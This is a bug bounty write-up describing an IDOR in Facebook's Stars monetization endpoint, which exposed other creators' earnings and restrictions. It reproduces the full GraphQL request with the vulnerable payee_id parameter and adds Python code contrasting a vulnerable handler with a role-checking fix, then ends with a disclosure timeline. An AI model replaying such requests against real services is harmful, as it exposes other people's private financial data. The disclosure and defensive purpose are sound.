Unauthorized access to Facebook creator’s professional dashboard


Gtm Mänôz

Just after returning home from Bounty Con Singapore, I had to fly to India in mid-October 2022 for family reasons. While staying there, my personal Facebook account met the country-location eligibility criteria for Stars monetization.

On the midnight of 30 October 2022, I applied for Stars monetization on my personal Facebook account in order to explore the monetization section of the professional dashboard. After just 30 minutes of exploring Stars monetization, I was able to view any Facebook creator's estimated earnings, total stars received, and earnings restrictions imposed for violations of the monetization policies.

Request:

POST /graphql HTTP/2
Host: graph.facebook.com
-other headers-

client_doc_id=10537346114216466748965519952
{"params":{"is_on_load_actions_supported":true,"params":"{params:{\"server_params\":{\"subtype\":\"GTW\",\"payee_id\":\"pageID\",\"entrypoint\":\"MGMT_ADD_PAYOUT_NOTIFICATION\",\"client_extra\":{\"product_type\":\"stars\"},\"exit_destination\":\"deferred_onboarding_notifications\",\"hide_tabbar\":true},\"client_input_params\":{}},}","bloks_versioning_id":"Some_Value_1","app_id":"com.bloks.www.payout_onboarding"},"scale":"2","nt_context":{"styles_id":"Some_Value_2","using_white_navbar":true,"pixel_ratio":2,"is_push_on":true,"bloks_version":"Some_Value_3"}}

Here the parameter payee_id=pageID was vulnerable to IDOR: the server returned the payout data for whichever page ID was supplied, without checking that the requester had any role on that page, which disclosed the estimated earnings, total stars received, and earnings restrictions of other Facebook creators.
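To make the missing check concrete, here is an added Python illustration (not Facebook's code, and not from the author of this post) of the two handler shapes: one that trusts the supplied payee_id the way the write-up describes, and one that first verifies the requester's role on that page. The page roles, payout records, PAYOUT_READ_ROLES policy and the doubly-encoded request body are all constructed for the example; the inner params string is written as valid JSON, whereas the real Bloks payload shown above is looser.

```python
"""
Added illustration (not Facebook's code): a minimal server-side handler that
shows the IDOR pattern from the write-up and the ownership check that closes it.
All identifiers and data here are constructed; only the nested-JSON parameter
shape mirrors the request in the post, where payee_id sits inside a JSON
string embedded in the outer JSON document.
"""
import json

# Constructed sample data: which user holds which role on which page.
PAGE_ROLES = {
    "page_A": {"user_1": "ADMIN"},
    "page_B": {"user_2": "ADMIN", "user_3": "EDITOR"},
}

# Constructed monetization records keyed by page (payee) id.
PAYOUT_INFO = {
    "page_A": {"estimated_earnings_usd": 120.5, "stars_received": 2410, "restricted": False},
    "page_B": {"estimated_earnings_usd": 980.0, "stars_received": 19600, "restricted": True},
}

# Roles permitted to read payout data; a hypothetical policy choice for this example.
PAYOUT_READ_ROLES = {"ADMIN"}


class Forbidden(Exception):
    """Raised when the requester has no right to read the requested payee's data."""


def make_body(payee_id: str) -> str:
    """Build a request body in the doubly-encoded shape seen in the post (constructed)."""
    inner = {
        "params": {
            "server_params": {
                "subtype": "GTW",
                "payee_id": payee_id,
                "client_extra": {"product_type": "stars"},
            },
            "client_input_params": {},
        }
    }
    outer = {"params": {"is_on_load_actions_supported": True, "params": json.dumps(inner)}}
    return json.dumps(outer)


def extract_payee_id(body: str) -> str:
    """Pull payee_id out of the nested body: params.params is a JSON string
    whose server_params object carries the payee id."""
    outer = json.loads(body)
    inner = json.loads(outer["params"]["params"])
    return inner["params"]["server_params"]["payee_id"]


def vulnerable_handler(requester: str, body: str) -> dict:
    """The pattern the post describes: payee_id is trusted exactly as supplied,
    so any authenticated requester can read any page's payout record."""
    payee = extract_payee_id(body)
    return PAYOUT_INFO[payee]


def is_authorized(requester: str, payee: str) -> bool:
    """Object-level check: the requester must hold a payout-reading role on the page."""
    role = PAGE_ROLES.get(payee, {}).get(requester)
    return role in PAYOUT_READ_ROLES


def hardened_handler(requester: str, body: str) -> dict:
    """Same lookup, but the supplied payee_id is checked against the requester's roles."""
    payee = extract_payee_id(body)
    if not is_authorized(requester, payee):
        # Record both identities: many denials across distinct payee ids from one
        # requester is the access pattern an IDOR probe leaves behind.
        raise Forbidden(f"user {requester} may not read payout data for {payee}")
    return PAYOUT_INFO[payee]


if __name__ == "__main__":
    body = make_body("page_B")
    print(vulnerable_handler("user_1", body))  # user_1 has no role on page_B yet gets its data
    try:
        hardened_handler("user_1", body)
    except Forbidden as exc:
        print("denied:", exc)
    print(hardened_handler("user_2", body))  # page_B's admin still sees its own record
```

The important design point is that the check is keyed on the object actually being returned (the payee page), not merely on whether the caller is logged in or has monetization enabled for some page of their own.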

Unauthorized access to any Facebook creator’s professional dashboard

Timeline:

30 Oct, 2022 — Report sent to Facebook.
1 Nov, 2022 — Triaged.
3 Nov, 2022 — Bounty awarded by Facebook.
8 Nov, 2022 — Fixed.
15 Dec, 2022 — Bypass sent.
19 Dec, 2022 — Double bounty awarded by Facebook.
30 Jan–25 Oct, 2023 — Asked for an update.
25 Oct, 2023 — Was told that the issue had been mitigated during March, although no fix message was ever sent at that time.